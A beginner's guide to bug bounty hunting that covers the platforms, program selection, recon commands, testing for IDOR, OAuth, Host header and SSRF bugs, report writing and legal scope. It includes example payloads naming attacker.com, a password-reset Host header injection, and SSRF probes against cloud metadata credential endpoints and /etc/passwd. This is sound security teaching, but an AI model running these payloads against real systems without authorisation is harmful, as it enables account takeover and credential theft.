Bug Bounty Hunting: Getting Started
Key Takeaways
- HackerOne is the largest bug bounty platform by program count and total payout volume.
- Program selection is the highest-leverage decision you make.
- Effective bug bounty hunting is roughly 70% recon and 30% exploitation.
- IDOR is consistently one of the highest-payout bug classes because it's difficult to find with automation and requires understanding the application's data model.
- A valid vulnerability with a bad report gets marked informational, triaged as low, or duplicated out. The report is the product.
Bug bounty programs exist because finding security vulnerabilities is expensive and difficult at scale. Companies that run mature programs have concluded that paying external researchers to find bugs is cheaper than getting breached. Google's Vulnerability Reward Program has paid out over $50 million since 2010. HackerOne's top earners have made over $2 million each. The 20-year-old who found a critical iOS zero-click vulnerability from his bedroom and received a $300,000 Apple Security Bounty payout is not a myth.
Getting there, however, is not what YouTube thumbnails suggest. This is a methodical, technical discipline that requires real skill, patience, and a systematic approach. This guide covers what actually produces results — not the theory, but the workflow, tools, and decision-making process that separates researchers who make money from those who generate a lot of invalid reports.
The Platforms: Where Programs Live
HackerOne
The largest bug bounty platform by program count and total payout volume. As of 2025, HackerOne has paid out over $300 million to researchers. The platform has two program types:
Public programs are open to anyone with a verified HackerOne account. They're more competitive — every researcher with an account has access — but they're also where you learn. The Hacktivity feed shows recently disclosed reports with payout amounts, and disclosed reports from programs you're targeting are the most valuable free learning resource in the industry.
Private programs are invite-only, extended based on your reputation score and signal (valid report rate). Private programs typically have less competition, broader scope, faster response times, and higher payouts. Getting invited requires building a track record on public programs first.
Signal score matters. HackerOne tracks the percentage of your reports that are valid vs. invalid/spam/duplicate. A low signal score limits your invitations to private programs. Don't report unless you have high confidence it's valid.
Bugcrowd
Similar model to HackerOne with a heavier enterprise focus. Bugcrowd's triage team handles first-pass validation before reports reach the program — which means slower initial feedback but more consistent responses. Their "VRT" (Vulnerability Rating Taxonomy) provides a standardized severity framework that's useful for calibrating your own severity assessments.
Bugcrowd also offers Penetration Testing as a Service (PTaaS), which is closer to structured consulting engagements than open bounty hunting.
Intigriti
Europe-based with a strong mid-market program selection. Scope overlap with HackerOne is relatively low, so running both platforms in parallel is worthwhile. GDPR-compliant programs often appear here first before expanding to US-based platforms. Response times tend to be fast.
Synack
A curated, vetted network. You apply and go through a vetting process (including a technical skills assessment). Synack pays researchers for time in addition to bounties, which provides more predictable income. The downside: it's not open enrollment. Getting in takes demonstrable skill.
Specialized Platforms
Federacy and NCSC coordinated vulnerability disclosure (Netherlands) cover government and public sector targets. These programs often have the cleanest, least-competed-on scope — and in the Netherlands, an effective legal framework that protects researchers who follow the rules.
HackerOne's "Programs Without Bounties" — responsible disclosure programs that don't pay. Still worth testing: they build your profile, often lead to Hall of Fame acknowledgments, and the skills transfer to paid programs.
Start on HackerOne. Create an account, spend the first two weeks reading disclosed reports on programs you're interested in. The HackerOne Hacktivity feed and individual program disclosure archives are the most concentrated source of "what vulnerabilities actually look like in production" you'll find anywhere.
Target Selection: Where Most Beginners Waste Time
Program selection is the highest-leverage decision you make. Choosing the wrong target costs weeks.
What to Avoid
Programs with very broad scope and zero payout history. Check the "average bounty" and "reports resolved" stats on the program page. If a program has been live for two years and paid out $0, there's a reason — either the scope is too restrictive in practice, the program doesn't prioritize response, or all the bugs have been found.
Programs with 90+ day response SLAs. HackerOne displays median time to first response, median time to triage, and median time to bounty. Programs with long response times create dead capital — your vulnerability sits unresolved while you can't disclose it or test similar vectors.
Programs where everything is marked "out of scope" except one endpoint. This isn't a bug bounty program; it's a performance. Move on.
The top 10 most popular programs. Google, Facebook, Apple: every researcher on the planet targets them. Every easy vulnerability was found years ago. Finding something valid requires exceptional skill and significant time investment. Not the right starting point.
What to Target
Programs with wildcard scope (*.example.com, *.example-company.io). Wildcards mean more attack surface and more opportunity for something the security team hasn't had time to audit.
Recently launched programs or programs that have significantly expanded scope. New programs are a gold rush — the first wave of researchers hits them with recon tools and finds things fast. Follow program announcements on HackerOne's blog and Twitter/X.
Programs that pay for medium and low severities. A program that only pays for critical RCEs is not beginner-friendly. Programs with payout tables covering P3 and P4 findings signal that they want to improve overall security posture, not just avoid catastrophic breaches.
Programs in your area of technical expertise. If you've worked in fintech, target fintech companies. You understand the business logic, the likely attack surfaces, and what "impact" means to the business. Business logic vulnerabilities require domain knowledge that automated tools can't replace.
Check the program's Hacktivity/disclosed reports before spending any time on recon. Understand what vulnerability classes the program accepts, what severity ratings they've assigned to past findings, and what types of findings they've marked as informational or not applicable. This intelligence saves hours of reporting invalid bugs.
Recon Methodology: Building Attack Surface
Effective bug bounty hunting is 70% recon and 30% exploitation. The researchers making consistent income aren't spending all their time looking for vulnerabilities — they're spending most of their time finding attack surface that others haven't found yet.
Subdomain Enumeration
```bash
# Passive enumeration — no traffic to target
subfinder -d example.com -all -o passive_subs.txt

# Amass passive mode — pulls from additional sources
amass enum --passive -d example.com -o amass_passive.txt

# Certificate Transparency — every cert ever issued for the domain is logged
curl -s "https://crt.sh/?q=%.example.com&output=json" | \
  jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u > ct_subs.txt

# Combine all passive sources
cat passive_subs.txt amass_passive.txt ct_subs.txt | sort -u > all_passive.txt

# Active DNS brute-force (only after confirming scope allows it)
puredns bruteforce /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
  example.com -r /path/to/resolvers.txt -o brute_subs.txt

# Permutation and pattern generation
gotator -sub all_passive.txt -perm permutations_list.txt -depth 1 -numbers 5 | \
  puredns resolve -r /path/to/resolvers.txt > permuted_subs.txt

# Merge everything
cat all_passive.txt brute_subs.txt permuted_subs.txt | sort -u > all_subs.txt
```

Probing for Live Hosts
```bash
# Probe for HTTP/HTTPS on standard and non-standard ports
httpx -l all_subs.txt \
  -ports 80,443,8080,8443,8888,9000,3000,5000,4000,7000,9090 \
  -status-code \
  -title \
  -tech-detect \
  -follow-redirects \
  -o live_hosts.txt

# Extract just the URLs
cat live_hosts.txt | cut -d ' ' -f1 > live_urls.txt
```

Content Discovery
```bash
# Directory and file discovery on live hosts
feroxbuster -u https://app.example.com \
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt \
  -x php,asp,aspx,jsp,json,txt,bak,old,config,env \
  -t 50 \
  --depth 3 \
  -o ferox_output.txt

# ffuf with a status filter
ffuf -w /usr/share/seclists/Discovery/Web-Content/api-endpoints.txt \
  -u https://api.example.com/FUZZ \
  -mc 200,201,204,301,302,401,403 \
  -fc 404 \
  -t 40

# Google dorking to find exposed files
# site:example.com filetype:env
# site:example.com filetype:config
# site:example.com inurl:admin
# site:example.com "DB_PASSWORD"
# site:github.com "example.com" AND "password"
```

JavaScript File Analysis
JavaScript bundles are a goldmine: API endpoints, internal hostnames, authentication logic, feature flags, hardcoded secrets, and access control checks all live in frontend JavaScript.
```bash
# Crawl target and collect all JS files
katana -u https://app.example.com -jc -d 5 -o katana_output.txt
grep "\.js" katana_output.txt > js_files.txt

# Download and extract endpoints from JS files
cat js_files.txt | while read url; do
  curl -s "$url" | grep -oP '(?<=["\x27])/[a-zA-Z0-9_\-/]+(?=["\x27])' | sort -u
done | sort -u > js_endpoints.txt

# LinkFinder — more sophisticated endpoint extraction
python3 linkfinder.py -i https://app.example.com -d -o cli > linkfinder_results.txt

# SecretFinder — find credentials in JS
python3 SecretFinder.py -i https://app.example.com/main.js -o cli
# Looks for: API keys, tokens, passwords, AWS keys, Stripe keys, etc.
```

Automated Vulnerability Scanning
```bash
# Nuclei — template-based scanner covering thousands of vulnerability classes
nuclei -l live_urls.txt \
  -t ~/nuclei-templates/ \
  -severity medium,high,critical \
  -exclude-tags dos,fuzz \
  -rate-limit 50 \
  -o nuclei_findings.txt

# Target specific template categories
nuclei -l live_urls.txt -t ~/nuclei-templates/exposed-panels/ -o panels.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/default-credentials/ -o default_creds.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/cves/ -o cve_findings.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/misconfiguration/ -o misconfigs.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/technologies/ -o tech_detect.txt

# Specifically look for SSRF in webhook/URL-fetching features
nuclei -l live_urls.txt -t ~/nuclei-templates/vulnerabilities/generic/ssrf-via-* -o ssrf.txt
```

Nuclei is a commodity tool at this point. Every researcher runs it. The findings it surfaces (exposed admin panels, default credentials, known CVEs) are taken within hours of a program launching. Use nuclei to build an inventory and identify interesting targets, then apply manual analysis to what it surfaces. The money is in the manual work.
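One way to turn nuclei output into a manual-review queue is to split it by severity so critical and high findings get attention first. A minimal sketch, assuming nuclei's default output format (severity appears in square brackets); the function name and output file names are made up for illustration:

```bash
# triage_nuclei: split a nuclei findings file into per-severity files.
# Assumes nuclei's default line format, where severity appears as
# [critical], [high], or [medium].
triage_nuclei() {
  infile=$1
  for sev in critical high medium; do
    # grep exits non-zero when a severity has no hits; the empty file is still created
    grep "\[$sev\]" "$infile" > "findings_${sev}.txt" || :
  done
}
```

Run it as `triage_nuclei nuclei_findings.txt`, then start manual review from `findings_critical.txt` and work down.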
Vulnerability Hunting: High-Value Targets
IDOR (Insecure Direct Object Reference)
IDOR is consistently one of the highest-payout bug classes in bug bounty programs because it's difficult to find with automation and requires understanding the application's data model.
The pattern: an API endpoint takes an ID parameter (numeric, UUID, or other identifier) and returns or modifies the referenced resource without verifying that the authenticated user owns it.
```bash
# Testing methodology for IDOR:
# 1. Create two accounts (Account A and Account B)
# 2. With Account A: create a resource (order, invoice, message, etc.)
# 3. Note the resource ID in the API response
# 4. With Account B: attempt to access that resource ID

# Using Burp Suite Repeater:
# Capture a request as Account A
# Change the Authorization/Cookie header to Account B's session
# Observe whether Account B receives Account A's data

# Automated IDOR testing with a Burp Intruder setup:
# - Use Account A to generate 10 resource IDs
# - Replace session cookie with Account B's session
# - Intruder: Sniper mode, payload positions on the ID parameter
# - Payload: list of Account A's resource IDs
# - Grep match: Account A's unique identifiers in response
```

IDOR variants to test:
- GET resource (read) — lowest impact, but frequently accepted
- PATCH/PUT resource (modify) — higher impact
- DELETE resource — high impact
- GET list endpoint with another user's `userId` parameter
- Multi-layer IDOR: get `organizationId` from one endpoint, use it to access another user's org data
- UUID-based IDOR: UUIDs are hard to enumerate but can be predicted if created sequentially
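The two-account methodology above can be partly scripted: fetch one of Account A's resource IDs with Account B's session and interpret the status code. A sketch — the helper name, endpoint, and token are hypothetical:

```bash
# classify_response: interpret the HTTP status returned when Account B
# requests a resource that belongs to Account A.
classify_response() {
  case "$1" in
    2??)     echo "possible-idor" ;;   # B received A's resource — investigate
    401|403) echo "access-denied" ;;   # an ownership check appears to exist
    404)     echo "not-found" ;;       # resource hidden or deleted
    *)       echo "inconclusive" ;;
  esac
}

# Usage (hypothetical endpoint and token — substitute real values):
# code=$(curl -s -o /dev/null -w '%{http_code}' \
#   -H "Authorization: Bearer $TOKEN_B" \
#   "https://app.example.com/api/v2/invoices/10042")
# classify_response "$code"
```

A `possible-idor` result still needs manual confirmation that the response body actually contains Account A's data, not an error page served with a 200.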
OAuth and Authentication Flow Abuse
OAuth implementations frequently contain vulnerabilities that bypass authentication entirely or lead to account takeover.
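The common `redirect_uri` bypass classes can be generated mechanically from the legitimate callback URL. A minimal sketch — the function name and URLs are illustrative, not a complete bypass list:

```bash
# redirect_uri_payloads: emit common redirect_uri bypass candidates from a
# legitimate callback URL and an attacker-controlled domain.
redirect_uri_payloads() {
  legit=$1   # e.g. https://app.example.com/callback
  evil=$2    # e.g. attacker.com
  host=${legit#https://}; host=${host%%/*}  # extract the legitimate host
  echo "https://$evil"                  # full replacement
  echo "https://$host.$evil/callback"   # subdomain suffix confusion
  echo "https://$host/../$evil"         # path traversal
  echo "$legit?x=https://$evil"         # chain through an open redirect
}
```

Feed each candidate into the authorization URL's `redirect_uri` parameter and note which, if any, the provider accepts.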
```bash
# redirect_uri manipulation
# Original: redirect_uri=https://app.example.com/callback
# Attack 1: redirect_uri=https://attacker.com
# Attack 2: redirect_uri=https://app.example.com.attacker.com
# Attack 3: redirect_uri=https://app.example.com/../attacker.com
# Attack 4: redirect_uri=https://app.example.com/callback?x=attacker.com (if open redirect exists)

# state parameter CSRF
# If the state parameter is missing or predictable, the OAuth flow is vulnerable to CSRF
# Test: initiate OAuth flow, capture the authorization URL
# Visit the URL from a different browser session — does the code still work?

# Token leakage in Referer header
# If the callback page loads third-party resources, the authorization code in the URL
# may leak via the Referer header to those third-party servers

# Authorization code reuse
# After a successful OAuth flow, try reusing the same authorization code
# Should fail with "code already used" — if not, it's a finding
```

Host Header Injection
Many applications use the Host header to construct URLs for password reset emails, OAuth callbacks, and canonical links. A manipulable Host header can redirect password reset tokens to an attacker-controlled domain.
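The Host-override header variants worth cycling through can be generated with a small helper; the function name, endpoint, and domains are placeholders:

```bash
# host_header_probes: print each Host-override header worth testing, given an
# attacker-controlled domain.
host_header_probes() {
  d=$1
  printf 'Host: %s\n' "$d"
  printf 'X-Forwarded-Host: %s\n' "$d"
  printf 'X-Host: %s\n' "$d"
  printf 'X-Forwarded-Server: %s\n' "$d"
  printf 'Forwarded: host=%s\n' "$d"
}

# Usage (placeholder endpoint): send one reset request per header variant,
# then check which variant, if any, appears in the reset email's link.
# host_header_probes attacker.com | while IFS= read -r hdr; do
#   curl -s -X POST -H "$hdr" -H 'Content-Type: application/json' \
#     -d '{"email":"victim@example.com"}' https://app.example.com/forgot-password
# done
```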
```http
# Test for Host header injection in password reset
POST /forgot-password HTTP/1.1
Host: attacker.com
Content-Type: application/json

{"email": "victim@example.com"}

# If the password reset email contains a link to attacker.com, it's a critical finding
# The victim clicks a "legitimate-looking" reset link that sends their token to the attacker

# Additional Host header tests:
# X-Forwarded-Host: attacker.com
# X-Host: attacker.com
# X-Forwarded-Server: attacker.com
# Forwarded: host=attacker.com
```

SSRF (Server-Side Request Forgery)
Cloud environments make SSRF critical. Any feature that fetches a user-supplied URL is a potential SSRF vector.
```bash
# Test webhook URL fields, URL preview features, PDF generation, image import
# Basic test payloads:
# http://169.254.169.254/latest/meta-data/ (AWS)
# http://169.254.169.254/latest/meta-data/iam/security-credentials/ (AWS IAM creds)
# http://metadata.google.internal/computeMetadata/v1/ (GCP)
# http://169.254.169.254/metadata/v1/ (DigitalOcean)
# http://localhost:6379/ (Redis)
# http://localhost:9200/ (Elasticsearch)
# http://10.0.0.1/ (internal network discovery)
# file:///etc/passwd (local file access — if scheme allows)

# Use Burp Collaborator or interactsh for blind SSRF detection
# If the server makes any DNS or HTTP request to your OAST server, SSRF is confirmed
interactsh-client &
# Use generated domain in payload: http://your-unique-id.oast.fun/

# Tools
# ssrf-sheriff — purpose-built SSRF testing tool
# ffuf with SSRF payloads list from PayloadsAllTheThings
```

Account Takeover via Password Reset
```bash
# Password reset token entropy test
# Request 10 reset tokens for the same account
# Compare: are they random? Sequential? Time-based? Predictable?

# Host header injection (see above)

# Response manipulation: does the server validate the token server-side?
# 1. Request a password reset for victim@example.com
# 2. Intercept the reset request validation
# 3. Modify the response: change "valid": false to "valid": true
# If this works, the client trusts the server response without server-side enforcement

# Token in URL shared via Referer
# Complete a password reset
# Note if the reset URL contains the token
# Check if the reset page loads any third-party resources (analytics, fonts, images)
# Burp: look at the Referer header sent to those third-party servers
# If the Referer contains the reset token, it was leaked

# Weak token format — 6-digit numeric with no rate limiting (Instagram 2019 bug)
# If you can make 1,000,000 requests and there's no lockout, all tokens are enumerable
```

Writing Reports That Get Paid
A valid vulnerability with a bad report gets marked informational, triaged as low, or duplicated out. The report is the product.
Report Structure
# IDOR on /api/v2/invoices/{id} allows read access to arbitrary user invoices
## Summary
An Insecure Direct Object Reference (IDOR) vulnerability on the invoice retrieval endpoint
allows any authenticated user to read invoices belonging to other users by manipulating
the `id` path parameter. No ownership verification is performed server-side.
## Severity
High (CVSS 3.1 base score: 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N; rated High given the scale of cross-user data exposure)
## Steps to Reproduce
1. Create Account A (attacker@test.com) and Account B (victim@test.com)
2. With Account B, create an invoice. Note the invoice ID returned in the response:
`{"id": 10042, "amount": 5000, "status": "pending"}`
3. Log into Account A and capture a valid session token.
4. Send the following request as Account A:
GET /api/v2/invoices/10042 HTTP/1.1
Host: app.example.com
Authorization: Bearer <Account_A_token>
5. The server returns Account B's invoice data:
{"id": 10042, "userId": "uuid-of-account-b", "amount": 5000, "status": "pending", "recipient": "Client Corp"}
## Impact
An authenticated attacker can read the contents of any invoice in the system by iterating
the numeric `id` parameter. This exposes invoice amounts, client names, contact information,
and payment status for every user. By iterating IDs 1 through N, an attacker can exfiltrate
the entire invoice database. Estimated records exposed: [check by requesting /api/v2/invoices/count].
## Proof of Concept
[Attach: screenshot of Burp request/response showing the cross-user data access]
[Attach: curl command showing reproduction]
```bash
curl -s -H "Authorization: Bearer ACCOUNT_A_TOKEN" \
  https://app.example.com/api/v2/invoices/10042 | jq .userId
# Returns Account B's userId — confirms cross-account access
```
## Remediation
Add an ownership check to the invoice retrieval query:
```sql
SELECT * FROM invoices WHERE id = $1 AND user_id = $2;
```

Pass the authenticated user's ID as the second parameter. Return HTTP 403 if no record is found.
## References
- OWASP A01:2021 – Broken Access Control
- CWE-639: Authorization Bypass Through User-Controlled Key
### Common Report Mistakes
**Missing reproduction steps.** The triager should be able to reproduce your finding in under five minutes without asking you anything. If your steps require assumptions or context they don't have, your report stalls.
**Overstated severity.** A missing security header rated as Critical, or a rate-limiting gap on a non-sensitive endpoint rated as High — triagers see this constantly. It signals inexperience and damages your credibility. Use CVSS and justify it. If a finding requires significant user interaction or specific conditions, the severity goes down.
**No demonstrated impact.** "This could lead to data exposure" is not impact. "An unauthenticated attacker can read all user invoices by iterating the numeric id parameter from 1 to N, exposing names, email addresses, billing addresses, and payment amounts for all X users" is impact.
**Reporting missing headers as High/Critical.** Missing `Content-Security-Policy`, `X-Frame-Options`, or `X-Content-Type-Options` without a demonstrated impact gets marked Informational. These findings have value only when combined with an actual exploitation scenario.
**Self-XSS.** If the payload only executes in your own session, it's not a valid XSS submission. The attack must affect a different user.
**Chasing version numbers.** "The server is running Apache 2.4.49, which is vulnerable to CVE-2021-41773" is only valid if you can demonstrate the actual exploit works in this environment. Version disclosure + CVE ≠ validated finding.
---
## Building a Recon Pipeline
Manual recon is slow. Researchers making consistent income have automated the commodity work so they can focus on the manual analysis that differentiates findings.
```bash
#!/bin/bash
# Simple recon automation script — runs on a new target domain
TARGET=$1
OUTPUT_DIR="recon-$TARGET-$(date +%Y%m%d)"
mkdir -p "$OUTPUT_DIR"
echo "[+] Starting passive subdomain enumeration for $TARGET"
subfinder -d "$TARGET" -all -silent -o "$OUTPUT_DIR/subs_passive.txt"
amass enum --passive -d "$TARGET" -o "$OUTPUT_DIR/subs_amass.txt"
curl -s "https://crt.sh/?q=%.${TARGET}&output=json" | \
jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u > "$OUTPUT_DIR/subs_ct.txt"
echo "[+] Merging and resolving subdomains"
cat "$OUTPUT_DIR"/subs_*.txt | sort -u | \
puredns resolve -r ~/resolvers.txt > "$OUTPUT_DIR/resolved_subs.txt"
echo "[+] Probing for live hosts"
httpx -l "$OUTPUT_DIR/resolved_subs.txt" \
-ports 80,443,8080,8443,3000,5000 \
-status-code -title -tech-detect \
-o "$OUTPUT_DIR/live_hosts.txt"
cat "$OUTPUT_DIR/live_hosts.txt" | cut -d ' ' -f1 > "$OUTPUT_DIR/live_urls.txt"
echo "[+] Running nuclei scans"
nuclei -l "$OUTPUT_DIR/live_urls.txt" \
-t ~/nuclei-templates/ \
-severity medium,high,critical \
-exclude-tags dos \
-o "$OUTPUT_DIR/nuclei_results.txt"
echo "[+] Crawling for endpoints and JS files"
katana -list "$OUTPUT_DIR/live_urls.txt" -d 3 -jc -o "$OUTPUT_DIR/katana_output.txt"
echo "[+] Done. Results in $OUTPUT_DIR/"
```
Schedule this script to run weekly against your target list. Attack surface changes constantly — new subdomains appear, new features launch, new misconfigurations are introduced. Researchers who recheck targets they've previously tested often find new bugs introduced by updates and deployments.
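A weekly schedule can be as simple as one crontab entry; the script path and target list below are placeholders for wherever you keep the script above:

```bash
# m h dom mon dow  command — run the recon script every Monday at 03:00
# against each domain in ~/targets.txt (one domain per line; paths are assumptions)
0 3 * * 1  while read -r t; do "$HOME/bin/recon.sh" "$t"; done < "$HOME/targets.txt"
```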
Realistic Financial Expectations
The bug bounty economics are worth being honest about:
- Median payout per valid finding: $400-$800 (P3 Medium severity)
- High severity (P2) typical range: $2,000-$10,000
- Critical severity (P1) typical range: $5,000-$100,000+
All-time record payouts (public data):
- Apple Security Research Device Program: $300,000 (iOS zero-click)
- Google VRP: $605,000 (combined chain across multiple bugs, 2022)
- Samsung Mobile Security: $1,000,000 (theoretical maximum; first claimed in 2023)
Time reality: Expect to spend 20-40 hours before your first valid finding. Most researchers report 3-6 months before making meaningful income. The researchers consistently earning $100,000+/year have typically been doing this for 3+ years.
What top earners have in common:
- Narrow specialization in 1-2 vulnerability classes where they have deep expertise
- Proprietary automation built on top of commodity tools
- Focus on specific industry verticals where they understand business logic
- Reputation high enough to access premium private programs
- Systematic documentation of every target tested and methodology applied
The $200/hour fantasy from YouTube is real for a small number of experienced researchers. The realistic starting expectation is closer to minimum wage per hour — until your skill and reputation compound.
Legal and Ethical Boundaries
The rules are simple and absolute:
1. Read the program scope before sending a single request to any target
2. Test only assets explicitly listed in scope
3. Do not access, modify, or exfiltrate real user data — stop at proof of concept
4. Report what you find, don't exploit it further
5. If scope is ambiguous, ask before testing
Out-of-scope testing gets you permanently banned from the platform and can expose you to legal liability under the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), and equivalent statutes in other jurisdictions. Safe harbor language in bug bounty policies only protects you when you stay within scope and follow responsible disclosure rules.
A common gray area: you find an asset that looks like it belongs to the target company but isn't explicitly listed in scope. Don't test it. Message the program, ask if it's in scope, and wait for a response. This approach has led to scope expansions and bonus payments for researchers who've found critical bugs on previously out-of-scope assets — the right way.
Getting Started: Week-by-Week
Week 1-2: Complete PortSwigger Web Security Academy's learning paths for SQL Injection, XSS, CSRF, and Authentication. Do every lab. Understand the mechanics, not just the payloads.
Week 3-4: Set up your tools environment — Kali Linux VM, Burp Suite Community, Subfinder, httpx, nuclei, ffuf, katana. Run through the setup guide for each tool.
Week 5-6: Choose a public program on HackerOne with wildcard scope and medium severity payouts. Run your recon pipeline. Read every disclosed report for that program. Don't submit yet — just learn the target's architecture.
Week 7-8: Start testing manually. Focus on a single vulnerability class — IDOR is recommended for beginners because it requires no special tools, the methodology is learnable, and the payouts are consistent. Find 20 API endpoints and test every resource parameter for cross-user access.
Week 9+: Your first report. Make it a clear, technically accurate, well-documented submission. Then iterate. Track every submission, whether valid or not, and analyze what you're missing.
The researchers who make it are systematic, patient, and rigorous. They treat it like a craft rather than a lottery. If you approach it the same way, the results follow.